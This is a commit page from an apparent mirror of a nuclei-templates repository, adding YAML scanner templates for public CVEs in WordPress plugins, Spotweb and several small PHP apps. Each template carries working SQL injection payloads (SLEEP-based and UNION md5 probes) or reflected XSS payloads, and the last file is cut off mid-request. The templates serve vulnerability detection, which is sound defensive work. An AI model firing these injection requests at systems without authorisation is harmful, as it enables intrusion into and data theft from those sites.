daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

templates added

patch-10
Prince Chaddha 2023-06-05 12:33:16 +05:30
parent bb76430753
commit ffc66c4bd8
29 changed files with 1205 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
http/cves/2021/CVE-2021-24731.yaml Normal file
View File

@ -0,0 +1,41 @@
id: CVE-2021-24731
info:
name: Pie Register < 3.7.1.6 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.
remediation: Fixed in version 3.7.1.6
reference:
- https://wpscan.com/vulnerability/6bed00e4-b363-43b8-a392-d068d342151a
- https://wordpress.org/plugins/pie-register/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24731
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24731
cwe-id: CWE-89
metadata:
max-request: 1
verified: "true"
tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth
http:
- raw:
- |
@timeout: 10s
POST /wp-json/pie/v1/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
user_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "User credentials are invalid.")'
condition: and

47
http/cves/2021/CVE-2021-27124.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2021-27124
info:
name: Doctor Appointment System 1.0 - SQL Injection
author: theamanrawat
severity: medium
description: |
SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0.
reference:
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
- https://packetstormsecurity.com/files/161342/Doctor-Appointment-System-1.0-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-27124
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-27124
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,doctor-appointment-system,unauthenticated
http:
- raw:
- |
POST /patient/search_result.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
expertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=
matchers-condition: and
matchers:
- type: word
part: body
words:
- "c8c605999f3d8352d7bb792cf3fdb25b"
- "Doctor Appoinment System"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

39
http/cves/2021/CVE-2021-40908.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2021-40908
info:
name: Purchase Order Management v1.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter.
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-09
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40908
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-40908
cwe-id: CWE-89
metadata:
max-req: 1
verified: "true"
tags: cve,cve2021,sqli,purchase-order,poms
http:
- raw:
- |
POST /classes/Login.php?f=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username=test'+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+'orQN'='orQN&password=test
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "status\":\"incorrect\"")'
condition: and

50
http/cves/2021/CVE-2021-40968.yaml Normal file
View File

@ -0,0 +1,50 @@
id: CVE-2021-40968
info:
name: Spotweb <= 1.5.1 - Cross Site Scripting
author: theamanrawat
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter.
remediation: Fixed in version 1.5.2
reference:
- https://github.com/spotweb/spotweb/
- https://github.com/spotweb/spotweb/issues/711
- https://nvd.nist.gov/vuln/detail/CVE-2021-40968
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-40968
cwe-id: CWE-79
metadata:
max-request: 1
verified: "true"
shodan-query: title:"SpotWeb - overview"
tags: cve,cve2021,xss,spotweb
http:
- raw:
- |
POST /install.php?page=4 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
settingsform[newpassword2]=pdteam'+onclick='alert(document.domain)
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onclick='alert(document.domain)"
- "Spotweb"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

50
http/cves/2021/CVE-2021-40969.yaml Normal file
View File

@ -0,0 +1,50 @@
id: CVE-2021-40969
info:
name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)
author: theamanrawat
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the firstname parameter.
remediation: Fixed in version 1.5.2
reference:
- https://github.com/spotweb/spotweb/
- https://github.com/spotweb/spotweb/issues/711
- https://nvd.nist.gov/vuln/detail/CVE-2021-40969
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-40969
cwe-id: CWE-79
metadata:
max-request: 1
verified: "true"
shodan-query: title:"SpotWeb - overview"
tags: cve,cve2021,xss,spotweb
http:
- raw:
- |
POST /install.php?page=4 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
settingsform[firstname]=pdteam'+onclick='alert(document.domain)
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onclick='alert(document.domain)"
- "Spotweb"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

50
http/cves/2021/CVE-2021-40970.yaml Normal file
View File

@ -0,0 +1,50 @@
id: CVE-2021-40970
info:
name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)
author: theamanrawat
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter.
remediation: Fixed in version 1.5.2
reference:
- https://github.com/spotweb/spotweb/
- https://github.com/spotweb/spotweb/issues/711
- https://nvd.nist.gov/vuln/detail/CVE-2021-40970
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-40970
cwe-id: CWE-79
metadata:
max-request: 1
verified: "true"
shodan-query: title:"SpotWeb - overview"
tags: cve,cve2021,xss,spotweb,unauthenticated
http:
- raw:
- |
POST /install.php?page=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
settingsform[username]=pdteam'+onclick='alert(document.domain)
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onclick='alert(document.domain)"
- "Spotweb"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

50
http/cves/2021/CVE-2021-40971.yaml Normal file
View File

@ -0,0 +1,50 @@
id: CVE-2021-40971
info:
name: Spotweb <= 1.5.1 - Cross Site Scripting
author: theamanrawat
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword1 parameter.
remediation: Fixed in version 1.5.2
reference:
- https://github.com/spotweb/spotweb/
- https://github.com/spotweb/spotweb/issues/711
- https://nvd.nist.gov/vuln/detail/CVE-2021-40971
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-40971
cwe-id: CWE-79
metadata:
max-request: 1
verified: "true"
shodan-query: title:"SpotWeb - overview"
tags: cve,cve2021,xss,spotweb
http:
- raw:
- |
POST /install.php?page=4 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
settingsform[newpassword1]=pdteam'+onclick='alert(document.domain)
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onclick='alert(document.domain)"
- "Spotweb"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

50
http/cves/2021/CVE-2021-40972.yaml Normal file
View File

@ -0,0 +1,50 @@
id: CVE-2021-40972
info:
name: Spotweb <= 1.5.1 - Cross Site Scripting
author: theamanrawat
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter.
remediation: Fixed in version 1.5.2
reference:
- https://github.com/spotweb/spotweb/
- https://github.com/spotweb/spotweb/issues/711
- https://nvd.nist.gov/vuln/detail/CVE-2021-40972
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-40972
cwe-id: CWE-79
metadata:
max-request: 1
verified: "true"
shodan-query: title:"SpotWeb - overview"
tags: cve,cve2021,xss,spotweb
http:
- raw:
- |
POST /install.php?page=4 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
settingsform[mail]=pdteam'+onclick='alert(document.domain)
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onclick='alert(document.domain)"
- "Spotweb"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

50
http/cves/2021/CVE-2021-40973.yaml Normal file
View File

@ -0,0 +1,50 @@
id: CVE-2021-40973
info:
name: Spotweb <= 1.5.1 - Cross Site Scripting
author: theamanrawat
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the lastname parameter.
remediation: Fixed in version 1.5.2
reference:
- https://github.com/spotweb/spotweb/
- https://github.com/spotweb/spotweb/issues/711
- https://nvd.nist.gov/vuln/detail/CVE-2021-40973
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-40973
cwe-id: CWE-79
metadata:
max-request: 1
verified: "true"
shodan-query: title:"SpotWeb - overview"
tags: cve,cve2021,xss,spotweb
http:
- raw:
- |
POST /install.php?page=4 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
settingsform[lastname]=pdteam'+onclick='alert(document.domain)
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onclick='alert(document.domain)"
- "Spotweb"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

43
http/cves/2021/CVE-2021-43725.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2021-43725
info:
name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)
author: theamanrawat
severity: medium
description: |
There is a Cross Site Scripting (XSS) vulnerability in SpotPage_login.php of Spotweb 1.5.1 and below, which allows remote attackers to inject arbitrary web script or HTML via the data[performredirect] parameter.
remediation: Fixed in version 1.5.2
reference:
- https://github.com/spotweb/spotweb/
- https://github.com/spotweb/spotweb/issues/718
- https://nvd.nist.gov/vuln/detail/CVE-2021-43725
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-43725
cwe-id: CWE-79
metadata:
verified: "true"
shodan-query: title:"SpotWeb - overview"
tags: cve,cve2021,xss,spotweb,unauth
http:
- method: GET
path:
- "{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'name="data[performredirect]" value=""><script>alert(document.domain)</script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

38
http/cves/2022/CVE-2022-28022.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2022-28022
info:
name: Purchase Order Management v1.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-1.md
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-28022
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-28022
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,purchase-order-management-system,unauth
http:
- raw:
- |
POST /classes/Master.php?f=delete_item HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
id=test'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "success")'
condition: and

39
http/cves/2022/CVE-2022-28023.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2022-28023
info:
name: Purchase Order Management v1.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_supplier.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-2.md
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-28023
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-28023
cwe-id: CWE-89
metadata:
max-req: 1
verified: "true"
tags: cve,cve2022,sqli,purchase-order,poms
http:
- raw:
- |
POST /classes/Master.php?f=delete_supplier HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
id=aman'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "status\":\"success")'
condition: and

37
http/cves/2022/CVE-2022-31879.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2022-31879
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter.
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31879
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-31879
cwe-id: CWE-89
metadata:
max-request: 1
verified: "true"
tags: cve,cve2022,sqli,online-fire-reporting
http:
- raw:
- |
@timeout: 10s
GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Dashboard")'
condition: and

45
http/cves/2022/CVE-2022-31974.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2022-31974
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-1.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31974
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31974
cwe-id: CWE-89
metadata:
max-request: 1
verified: "true"
tags: cve,cve2022,sqli,online-fire-reporting
variables:
num: '999999999'
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{md5(num)}}"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

40
http/cves/2022/CVE-2022-31975.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2022-31975
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user&id=.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-2.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31975
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31975
cwe-id: CWE-89
metadata:
max-req: 1
verified: "true"
tags: cve,cve2022,sqli,online-fire-reporting
variables:
num: '999999999'
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{md5(num)}}"
- type: status
status:
- 200

40
http/cves/2022/CVE-2022-31976.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2022-31976
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: critical
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-4.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31976
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-31976
cwe-id: CWE-89
metadata:
max-req: 1
verified: "true"
tags: cve,cve2022,sqli,online-fire-reporting
http:
- raw:
- |
@timeout: 10s
POST /classes/Master.php?f=delete_request HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "status\":\"success\"}")'
condition: and

40
http/cves/2022/CVE-2022-31977.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2022-31977
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: critical
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_team.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-3.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31977
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-31977
cwe-id: CWE-89
metadata:
max-req: 1
verified: "true"
tags: cve,cve2022,sqli,online-fire-reporting
http:
- raw:
- |
@timeout: 10s
POST /classes/Master.php?f=delete_team HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "status\":\"success\"}")'
condition: and

40
http/cves/2022/CVE-2022-31978.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2022-31978
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: critical
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_inquiry.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-5.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31978
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-31978
cwe-id: CWE-89
metadata:
max-request: 1
verified: "true"
tags: cve,cve2022,sqli,online-fire-reporting
http:
- raw:
- |
@timeout: 10s
POST /classes/Master.php?f=delete_inquiry HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "status\":\"success")'
condition: and

35
http/cves/2022/CVE-2022-31980.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2022-31980
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team&id=.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-7.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31980
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31980
cwe-id: CWE-89
metadata:
max-req: 1
verified: "true"
tags: cve,cve2022,sqli,online-fire-reporting
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Control Teams")'
condition: and

35
http/cves/2022/CVE-2022-31981.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2022-31981
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team&id=.
reference:
- https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-6.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31981
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31981
cwe-id: CWE-89
metadata:
max-request: 1
verified: "true"
tags: cve,cve2022,sqli,online-fire-reporting
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Control Teams")'
condition: and

35
http/cves/2022/CVE-2022-31982.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2022-31982
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=.
reference:
- https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-8.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31982
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31982
cwe-id: CWE-89
metadata:
max-req: 1
verified: "true"
tags: cve,cve2022,sqli,online-fire-reporting
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Request Detail")'
condition: and

35
http/cves/2022/CVE-2022-31983.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2022-31983
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-9.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31983
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31983
cwe-id: CWE-89
metadata:
max-req: 1
verified: "true"
tags: cve,cve2022,sqli,online-fire-reporting
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Request Detail")'
condition: and

40
http/cves/2022/CVE-2022-31984.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2022-31984
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-10.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31984
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31984
cwe-id: CWE-89
metadata:
max-req: 1
verified: "true"
tags: cve,cve2022,sqli,online-fire-reporting
variables:
num: '999999999'
http:
- method: GET
path:
- "{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- type: status
status:
- 200

44
http/cves/2023/CVE-2023-0948.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2023-0948
info:
name: WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
WordPress Japanized for WooCommerce plugin before 2.5.8 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/a78d75b2-85a0-41eb-9720-c726ca2e8718
- https://wordpress.org/plugins/woocommerce-for-japan/
- https://nvd.nist.gov/vuln/detail/CVE-2023-0948
remediation: Fixed in version 2.5.8.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-0948
cwe-id: CWE-79
metadata:
max-request: 1
verified: "true"
tags: cve,cve2023,xss,woocommerce-for-japan,wordpress,wp-plugin,wpscan,wp,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=peachpay&tab=field&"><script>alert(/XSS/)</script> HTTP/1.1
